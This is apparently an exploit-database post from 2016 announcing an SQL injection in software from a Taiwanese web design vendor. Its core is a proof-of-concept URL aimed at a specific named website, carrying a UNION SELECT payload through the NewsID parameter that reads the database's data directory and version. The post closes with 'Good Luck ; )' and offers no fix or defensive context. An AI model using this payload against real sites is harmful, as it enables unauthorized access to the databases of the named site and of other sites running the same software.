======================================================= !*! Exploit Title : 牧迪網頁設計 Sql injection !*! Exploit Author : Malw4r3 !*! Email : Malw4r3@yahoo.com !*! Vendor Homepage : http://57.com.tw/ !*! Date: 01.02.2016 !*! Tested On : Windows [And] Kali ======================================================= $ => Poc: http://www.chickenking.com.tw/shownewsdetail.php?NewsID=-55' UNION SELECT 1,2,@@datadir,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--+ Good Luck ; ) =======================================================